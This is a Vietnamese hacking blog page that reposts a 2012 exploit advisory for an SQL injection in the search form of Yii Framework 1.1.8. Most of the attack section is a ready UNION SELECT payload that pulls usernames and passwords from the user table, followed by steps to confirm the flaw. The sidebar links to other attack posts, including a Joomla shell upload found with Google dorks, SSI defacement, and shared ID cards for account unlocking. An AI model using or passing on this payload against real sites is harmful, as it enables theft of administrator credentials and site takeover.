• About
  • Policy
  • Contact

Phan Anh Buổi Sáng

  • Home
  • Kiến thức IT
    • PSD
    • Blogger
  • Translate
Google
Custom Search
Trang chủ » Exploit » SQL Injection » Yii Framework - Search SQL Injection Vulnerability

Yii Framework - Search SQL Injection Vulnerability

Unknown Labels: Exploit, SQL Injection Leave A Comment 07:08 
# Exploit Title: Yii Framework - Search SQL Injection Vulnerability
# Google Dork: No Dork
# Date: 20/11/2012
# Exploit Author: Juno_okyo
# Vendor Homepage: http://www.yiiframework.com/
# Software Link: http://www.yiiframework.com/download/
# Version: 1.1.8 (maybe another version)
#
##############################
################################################################
Vulnerability:
##############################################################################################

SQL Injection via search form. You can query to get some info about administrator account and something...

##############################################################################################
Exploitation:
##############################################################################################

' UNION SELECT 1,group_concat(username,0x7c,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31 fRom user-- -

##############################################################################################
Ex:
##############################################################################################

1. Put a query in search form with quotes: http://i.imgur.com/8OShy.png
2. It will display an error message: http://i.imgur.com/b8Tbo.png
3. Now, get some info with SQL Injection: http://i.imgur.com/qLjc0.png
4. Result: http://i.imgur.com/dgCRU.png

##############################################################################################
More Details:
##############################################################################################

Website: http://junookyo.blogspot.com/
About Exploit: http://junookyo.blogspot.com/2012/11/yii-framework-search-sql-injection.html

##############################################################################################
Great thanks to Juno_okyo and James - J2TeaM
##############################################################################################

Published (21/11/2012):
[+] http://www.exploit-db.com/exploits/22877
[+] http://www.1337day.com/exploit/19778
[+] http://cxsecurity.com/issue/WLB-2012110151

Bài viết liên quan

← Bài đăng mới hơn Bài đăng cũ hơn → Trang chủ
Powered by Blogger.

Các Bình Luận Gần Đây

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    DOWNLOAD PSD
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • SSI (server side include) injection, shell and deface Page uploading tutorial
    SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites. Server-side Include allowed y...
  • Wordpress Plugins Spotlight Your Upload Vulnerability
    ___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ...
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Joomla Shell Upload Vulnerability
    requirements: 1.mind use this google dork to find vulnerable joomla sites ##  google dork : inurl:index.php?option=com_fabrik after open the...
  • Khai thác lỗ hổng XSS/CSS trên Facebook
    Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất. Thông thường, hầu ...

Pageviews from the past week

Chuyên mục

Bài đăng phổ biến

  • Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Ảnh bìa chế Phía sau một cô gái - Soobin Hoàng Sơn - Zoy Thủ Thuật #Zoy
    Đôi lúc em tránh ánh mắt của anh. vì dường như lúc nào em cũng hiểu thấu lòng anh Demo Cover Download PSD loading...
  • PSD - Người & Ta
    PSD - Người & Ta
    DOWNLOAD PSD
  • [PHP] Get list username - vBulletin
    <?php // GET user function duyk_get_all_usr($link, $total_usr) { $max_page = $total_usr/100; $ma...
  • Share CMND Nữ Cho Anh Em Để Unlock & Report
    Share CMND Nữ Cho Anh Em Để Unlock & Report
    COPYRIGHT : MINH HAKU IT                                               
  • SSI (server side include) injection, shell and deface Page uploading tutorial
    SSI (server side include) is a web application exploit, you can put your codes remotly to vulenrable websites. Server-side Include allowed y...
  • Wordpress Plugins Spotlight Your Upload Vulnerability
    ___________.__ _________ _________ \__ ___/| |__ ____ \_ ___ \______ ...
  • FCKEditor ASP Version 2.6.8 File Upload Protection Bypass
    - Title: FCKEditor 2.6.8 ASP Version File Upload Protection bypass - Credit goes to: Mostafa Azizi, Soroush Dalili - Link:http://sourceforge...
  • Owasp Xelenium - XSS Scanner
    XSS scanner, Xelenium. It is a nice security testing tool that can be used to test and find security vulnerabilities in websites and web a...
  • Joomla Shell Upload Vulnerability
    requirements: 1.mind use this google dork to find vulnerable joomla sites ##  google dork : inurl:index.php?option=com_fabrik after open the...
  • Khai thác lỗ hổng XSS/CSS trên Facebook
    Cross Site Scripting (còn được gọi là XSS hay CSS) là một trong những kỹ thuật tấn công tầng ứng dụng (L7) phổ biến nhất. Thông thường, hầu ...
Google
Custom Search
Support: Facebook | Twitter | Google+ | Giới thiệu
Copyright © 2015 • Phan Anh Buổi Sáng • All Right Reserved. Template by Template Việt